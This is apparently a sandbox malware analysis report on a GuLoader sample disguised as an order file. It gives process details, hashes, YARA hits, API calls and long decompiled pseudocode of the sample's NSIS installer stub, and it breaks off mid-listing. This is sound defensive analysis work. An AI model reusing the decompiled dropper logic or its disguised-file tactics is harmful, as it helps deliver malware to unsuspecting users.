Start date:	01/09/2022
Path:	C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe"
Imagebase:	0x400000
File size:	195584 bytes
MD5 hash:	8C2A59BD88B7E2C26045A604ED544288
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 3112, Parent PID: 2812

General

Target ID:	4
Start time:	00:01:25
Start date:	01/09/2022
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe"
Imagebase:	0xb90000
File size:	106496 bytes
MD5 hash:	7BAE06CBE364BB42B8C34FCFB90E3EBD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.22683438457.0000000000F70000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.27549390202.0000000000F70000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4392, Parent PID: 3112

General

Target ID:	5
Start time:	00:01:25
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c1b30000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Order_002376662-579588_Date 24082022.exePID: 2812, Parent PID: 5772COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	3.1%
Signature Coverage:	23%
Total number of Nodes:	818
Total number of Limit Nodes:	40

Executed Functions

Function 0040330D Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 368
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				int _t67;
				signed int _t68;
				int _t69;
				signed int _t71;
				void* _t95;
				signed int _t111;
				void* _t114;
				void* _t119;
				intOrPtr* _t120;
				char _t123;
				signed int _t142;
				signed int _t143;
				int _t151;
				void* _t152;
				intOrPtr* _t154;
				CHAR* _t157;
				CHAR* _t158;
				void* _t160;
				char* _t161;
				void* _t164;
				void* _t165;
				char _t190;

				 *(_t165 + 0x18) = 0;
				 *((intOrPtr*)(_t165 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t165 + 0x20) = 0;
				 *(_t165 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42472c = _t42;
				if(_t42 != 6) {
					_t120 = E00406431(0);
					if(_t120 != 0) {
						 *_t120(0xc00);
					}
				}
				_t157 = "UXTHEME";
				do {
					E004063C3(_t157); // executed
					_t157 =  &(_t157[lstrlenA(_t157) + 1]);
				} while ( *_t157 != 0);
				E00406431(0xa);
				 *0x424724 = E00406431(8);
				_t47 = E00406431(6);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42472f =  *0x42472f | 0x00000040;
					}
				}
				__imp__#17(_t160);
				__imp__OleInitialize(0); // executed
				 *0x4247f8 = _t47;
				SHGetFileInfoA(0x41fcf0, 0, _t165 + 0x38, 0x160, 0); // executed
				E00406099(0x423f20, "NSIS Error");
				_t51 = GetCommandLineA();
				_t161 = "\"C:\\Users\\Arthur\\Desktop\\Order_002376662-579588_Date 24082022.exe\" ";
				E00406099(_t161, _t51);
				 *0x424720 = GetModuleHandleA(0);
				_t54 = _t161;
				if("\"C:\\Users\\Arthur\\Desktop\\Order_002376662-579588_Date 24082022.exe\" " == 0x22) {
					 *(_t165 + 0x14) = 0x22;
					_t54 =  &M0042A001;
				}
				_t56 = CharNextA(E00405A5C(_t54,  *(_t165 + 0x14)));
				 *(_t165 + 0x1c) = _t56;
				while(1) {
					_t123 =  *_t56;
					_t173 = _t123;
					if(_t123 == 0) {
						break;
					}
					__eflags = _t123 - 0x20;
					if(_t123 != 0x20) {
						L13:
						__eflags =  *_t56 - 0x22;
						 *(_t165 + 0x14) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *(_t165 + 0x14) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L25:
							_t56 = E00405A5C(_t56,  *(_t165 + 0x14));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 != 0x53) {
								L20:
								__eflags =  *_t56 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t56 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t56 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t56 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t56 - 2)) = 0;
										__eflags =  &(_t56[2]);
										E00406099("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Sigtelinjens\\Tvtningerne",  &(_t56[2]));
										L30:
										_t158 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t158); // executed
										_t60 = E004032DC(_t173);
										_t174 = _t60;
										if(_t60 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t62 = E00402D98(_t176,  *(_t165 + 0x20)); // executed
											 *((intOrPtr*)(_t165 + 0x10)) = _t62;
											if(_t62 != 0) {
												L43:
												E004037F7();
												__imp__OleUninitialize();
												_t186 =  *((intOrPtr*)(_t165 + 0x10));
												if( *((intOrPtr*)(_t165 + 0x10)) == 0) {
													__eflags =  *0x4247d4;
													if( *0x4247d4 == 0) {
														L67:
														_t64 =  *0x4247ec;
														__eflags = _t64 - 0xffffffff;
														if(_t64 != 0xffffffff) {
															 *(_t165 + 0x14) = _t64;
														}
														ExitProcess( *(_t165 + 0x14));
													}
													_t67 = OpenProcessToken(GetCurrentProcess(), 0x28, _t165 + 0x18);
													__eflags = _t67;
													_t151 = 2;
													if(_t67 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t165 + 0x24);
														 *(_t165 + 0x38) = 1;
														 *(_t165 + 0x44) = _t151;
														AdjustTokenPrivileges( *(_t165 + 0x2c), 0, _t165 + 0x28, 0, 0, 0);
													}
													_t68 = E00406431(4);
													__eflags = _t68;
													if(_t68 == 0) {
														L65:
														_t69 = ExitWindowsEx(_t151, 0x80040002);
														__eflags = _t69;
														if(_t69 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t71;
														if(_t71 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E004057B5( *((intOrPtr*)(_t165 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x424740 == 0) {
												L42:
												 *0x4247ec =  *0x4247ec | 0xffffffff;
												 *(_t165 + 0x18) = E004038E9( *0x4247ec);
												goto L43;
											}
											_t154 = E00405A5C(_t161, 0);
											if(_t154 < _t161) {
												L39:
												_t183 = _t154 - _t161;
												 *((intOrPtr*)(_t165 + 0x10)) = "Error launching installer";
												if(_t154 < _t161) {
													_t152 = E00405720(_t186);
													lstrcatA(_t158, "~nsu");
													if(_t152 != 0) {
														lstrcatA(_t158, "A");
													}
													lstrcatA(_t158, ".tmp");
													_t163 = "C:\\Users\\Arthur\\Desktop";
													if(lstrcmpiA(_t158, "C:\\Users\\Arthur\\Desktop") != 0) {
														_push(_t158);
														if(_t152 == 0) {
															E00405703();
														} else {
															E00405686();
														}
														SetCurrentDirectoryA(_t158);
														_t190 = "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Sigtelinjens\\Tvtningerne"; // 0x43
														if(_t190 == 0) {
															E00406099("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Sigtelinjens\\Tvtningerne", _t163);
														}
														E00406099(0x425000,  *(_t165 + 0x1c));
														_t138 = "A";
														_t164 = 0x1a;
														 *0x425400 = "A";
														do {
															E004060BB(0, 0x41f8f0, _t158, 0x41f8f0,  *((intOrPtr*)( *0x424734 + 0x120)));
															DeleteFileA(0x41f8f0);
															if( *((intOrPtr*)(_t165 + 0x10)) != 0 && CopyFileA("C:\\Users\\Arthur\\Desktop\\Order_002376662-579588_Date 24082022.exe", 0x41f8f0, 1) != 0) {
																E00405E78(_t138, 0x41f8f0, 0);
																E004060BB(0, 0x41f8f0, _t158, 0x41f8f0,  *((intOrPtr*)( *0x424734 + 0x124)));
																_t95 = E00405738(0x41f8f0);
																if(_t95 != 0) {
																	CloseHandle(_t95);
																	 *((intOrPtr*)(_t165 + 0x10)) = 0;
																}
															}
															 *0x425400 =  *0x425400 + 1;
															_t164 = _t164 - 1;
														} while (_t164 != 0);
														E00405E78(_t138, _t158, 0);
													}
													goto L43;
												}
												 *_t154 = 0;
												_t155 = _t154 + 4;
												if(E00405B1F(_t183, _t154 + 4) == 0) {
													goto L43;
												}
												E00406099("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Sigtelinjens\\Tvtningerne", _t155);
												E00406099("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Sigtelinjens\\Tvtningerne\\Tilegnelserne\\Suppegrydernes79", _t155);
												 *((intOrPtr*)(_t165 + 0x10)) = 0;
												goto L42;
											}
											_t111 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t154 != _t111) {
												_t154 = _t154 - 1;
												if(_t154 >= _t161) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t158, 0x3fb);
										lstrcatA(_t158, "\\Temp");
										_t114 = E004032DC(_t174);
										_t175 = _t114;
										if(_t114 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t158);
										lstrcatA(_t158, "Low");
										SetEnvironmentVariableA("TEMP", _t158);
										SetEnvironmentVariableA("TMP", _t158);
										_t119 = E004032DC(_t175);
										_t176 = _t119;
										if(_t119 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t142 = _t56[4];
								__eflags = _t142 - 0x20;
								if(_t142 == 0x20) {
									L23:
									_t15 = _t165 + 0x20;
									 *_t15 =  *(_t165 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t142;
								if(_t142 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t143 = _t56[1];
							__eflags = _t143 - 0x20;
							if(_t143 == 0x20) {
								L19:
								 *0x4247e0 = 1;
								goto L20;
							}
							__eflags = _t143;
							if(_t143 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L13;
				}
				goto L30;
			}

0x0040331d
0x00403321
0x00403329
0x0040332d
0x00403332
0x0040333e
0x00403347
0x0040334c
0x0040334f
0x00403356
0x0040335d
0x0040335d
0x00403356
0x0040335f
0x00403364
0x00403365
0x00403371
0x00403375
0x0040337b
0x00403389
0x0040338e
0x00403395
0x00403399
0x0040339d
0x0040339f
0x0040339f
0x0040339d
0x004033a7
0x004033ae
0x004033b4
0x004033ca
0x004033da
0x004033df
0x004033e5
0x004033ec
0x004033ff
0x00403404
0x00403406
0x00403408
0x0040340d
0x0040340d
0x0040341d
0x00403423
0x004034ec
0x004034ec
0x004034ee
0x004034f0
0x00000000
0x00000000
0x0040342c
0x0040342f
0x00403437
0x00403437
0x0040343a
0x0040343f
0x00403441
0x00403441
0x00403442
0x00403442
0x00403447
0x0040344a
0x004034dc
0x004034e1
0x004034e6
0x004034e9
0x004034eb
0x004034eb
0x004034eb
0x00000000
0x00403450
0x00403450
0x00403451
0x00403454
0x0040346c
0x00403497
0x00403499
0x004034ac
0x004034d7
0x004034da
0x004034f8
0x004034fb
0x00403504
0x00403509
0x0040350f
0x0040351a
0x0040351c
0x00403521
0x00403523
0x0040357b
0x00403580
0x0040358a
0x00403591
0x00403595
0x00403629
0x00403629
0x0040362e
0x00403634
0x00403639
0x0040375d
0x00403763
0x004037df
0x004037df
0x004037e4
0x004037e7
0x004037e9
0x004037e9
0x004037f1
0x004037f1
0x00403773
0x0040377b
0x0040377d
0x0040377e
0x0040378b
0x0040379e
0x004037a6
0x004037aa
0x004037aa
0x004037b2
0x004037b7
0x004037be
0x004037cc
0x004037ce
0x004037d4
0x004037d6
0x00000000
0x00000000
0x00000000
0x004037c0
0x004037c6
0x004037c8
0x004037ca
0x004037d8
0x004037da
0x00000000
0x004037da
0x00000000
0x004037ca
0x004037be
0x00403648
0x0040364f
0x0040364f
0x004035a1
0x00403619
0x00403619
0x00403625
0x00000000
0x00403625
0x004035aa
0x004035ae
0x004035e4
0x004035e4
0x004035e6
0x004035ee
0x00403660
0x00403662
0x00403669
0x00403671
0x00403671
0x0040367c
0x00403681
0x00403690
0x00403694
0x00403695
0x0040369e
0x00403697
0x00403697
0x00403697
0x004036a4
0x004036aa
0x004036b0
0x004036b8
0x004036b8
0x004036c6
0x004036cb
0x004036dd
0x004036e5
0x004036eb
0x004036f7
0x004036fd
0x00403707
0x0040371d
0x0040372e
0x00403734
0x0040373b
0x0040373e
0x00403744
0x00403744
0x0040373b
0x00403748
0x0040374e
0x0040374e
0x00403753
0x00403753
0x00000000
0x00403690
0x004035f0
0x004035f2
0x004035fd
0x00000000
0x00000000
0x00403605
0x00403610
0x00403615
0x00000000
0x00403615
0x004035d9
0x004035db
0x004035df
0x004035e2
0x00000000
0x00000000
0x00000000
0x004035e2
0x00000000
0x004035db
0x0040352b
0x00403537
0x0040353c
0x00403541
0x00403543
0x00000000
0x00000000
0x0040354b
0x00403553
0x00403564
0x0040356c
0x0040356e
0x00403573
0x00403575
0x00000000
0x00000000
0x00000000
0x00403575
0x00000000
0x004034da
0x0040349b
0x0040349e
0x004034a1
0x004034a7
0x004034a7
0x004034a7
0x004034a7
0x00000000
0x004034a7
0x004034a3
0x004034a5
0x00000000
0x00000000
0x00000000
0x004034a5
0x00403456
0x00403459
0x0040345c
0x00403462
0x00403462
0x00000000
0x00403462
0x0040345e
0x00403460
0x00000000
0x00000000
0x00000000
0x00403460
0x00000000
0x00000000
0x00000000
0x00403431
0x00403431
0x00403431
0x00403432
0x00403432
0x00000000
0x00403431
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 00403332
GetVersion.KERNEL32 ref: 00403338
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040336B
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033A7
OleInitialize.OLE32(00000000), ref: 004033AE
SHGetFileInfoA.SHELL32(0041FCF0,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004033CA
GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004033DF
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" ,00000000,?,00000006,00000008,0000000A), ref: 004033F2
CharNextA.USER32(00000000,"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" ,00000020,?,00000006,00000008,0000000A), ref: 0040341D
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 0040351A
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 0040352B
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403537
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040354B
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403553
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403564
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040356C
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403580

Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E

Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6

Part of subcall function 004038E9: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne,1033,Borerig Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Borerig Setup: Installing,00000000,00000002,77313410), ref: 004039D9
Part of subcall function 004038E9: lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
Part of subcall function 004038E9: GetFileAttributesA.KERNEL32(Call), ref: 004039F7
Part of subcall function 004038E9: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne), ref: 00403A40
Part of subcall function 004038E9: RegisterClassA.USER32(00423EC0), ref: 00403A7D

Part of subcall function 004037F7: CloseHandle.KERNEL32(000002D4,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 00403809
Part of subcall function 004037F7: CloseHandle.KERNEL32(000002E4,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040381D

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040362E
ExitProcess.KERNEL32 ref: 0040364F
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 0040376C
OpenProcessToken.ADVAPI32(00000000), ref: 00403773
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040378B
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037AA
ExitWindowsEx.USER32(00000002,80040002), ref: 004037CE
ExitProcess.KERNEL32 ref: 004037F1

Part of subcall function 004057B5: MessageBoxIndirectA.USER32(0040A230), ref: 00405810

Strings

TEMP, xrefs: 0040355F
C:\Users\user\Desktop, xrefs: 00403681, 00403686, 004036B2
UXTHEME, xrefs: 0040335F, 00403364, 0040336A
.tmp, xrefs: 00403676
~nsu, xrefs: 0040365A
C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe, xrefs: 0040370C
TMP, xrefs: 00403567
SeShutdownPrivilege, xrefs: 00403785
"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" , xrefs: 004033E5, 004033EB, 004035A4
NSIS Error, xrefs: 004033D0
1033, xrefs: 0040357B
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403321
Low, xrefs: 0040354D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne, xrefs: 004034FF, 00403600, 004036AA, 004036B3
\Temp, xrefs: 00403531
Error launching installer, xrefs: 004035E6
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79, xrefs: 0040360B
C:\Users\user\AppData\Local\Temp\, xrefs: 0040350F, 00403514, 0040352A, 00403536, 00403545, 00403552, 0040355E, 00403566, 0040365F, 00403670, 0040367B, 00403687, 00403694, 004036A3, 00403752
", xrefs: 00403442

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: HandleProcess$ExitFile$CloseEnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
String ID: "$"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79$C:\Users\user\Desktop$C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3704715180-3514902069
Opcode ID: 6fb2701c2198554de983d489162d70f6248e26c12371a32bdff927a978f2d77a
Instruction ID: 629f98fd345f67a1e75e2db33264847053f345a98c6a7e8b50a39e9081f0102f
Opcode Fuzzy Hash: 6fb2701c2198554de983d489162d70f6248e26c12371a32bdff927a978f2d77a
Instruction Fuzzy Hash: 46C1E6702047506AD721AF759D89A2F3EACAB81706F45443FF581B61E2CB7C8A158B2F

Uniqueness

Uniqueness Score: -1.00%

Function 004052FE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004052FE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t113;
				void* _t121;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x423f04; // 0x10416
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						_t121 = CreateThread(0, 0, E00405292, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
						CloseHandle(_t121);
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004060BB(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x420d30;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x423eec - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x424728, 8);
							__eflags =  *0x4247cc - _t150;
							if( *0x4247cc == _t150) {
								_t113 =  *0x420508; // 0x4edb2c
								E004051C0( *((intOrPtr*)(_t113 + 0x34)), _t150);
							}
							E00404133(1);
							goto L25;
						}
						 *0x420100 = 2;
						E00404133(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E004041C1(_t157, _a12, _a16);
						}
						ShowWindow( *0x423ef0, _t150);
						ShowWindow(_v8, 8);
						E0040418F(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x424734;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x423ef0 = GetDlgItem(_a4, 0x403);
				 *0x423ee8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x423f04 = _t128;
				_v8 = _t128;
				E0040418F( *0x423ef0);
				 *0x423ef4 = E00404A5E(4);
				 *0x423f0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E0040415A(_a4);
				if(( *0x42473c & 0x00000003) != 0) {
					ShowWindow( *0x423ef0, _t150);
					if(( *0x42473c & 0x00000002) != 0) {
						 *0x423ef0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040418F( *0x423ee8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42473c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x00405304
0x0040530c
0x0040530f
0x00405317
0x0040531a
0x004054a9
0x004054af
0x004054cc
0x004054d3
0x004054d3
0x004054df
0x004054e5
0x00405507
0x00405507
0x0040550d
0x00405562
0x00405562
0x00405565
0x00000000
0x00000000
0x00405567
0x0040556a
0x0040556d
0x00000000
0x00000000
0x00405577
0x0040557d
0x0040557f
0x00405582
0x0040567f
0x00000000
0x0040567f
0x00405591
0x0040559d
0x004055a6
0x004055ad
0x004055b1
0x004055b4
0x004055bd
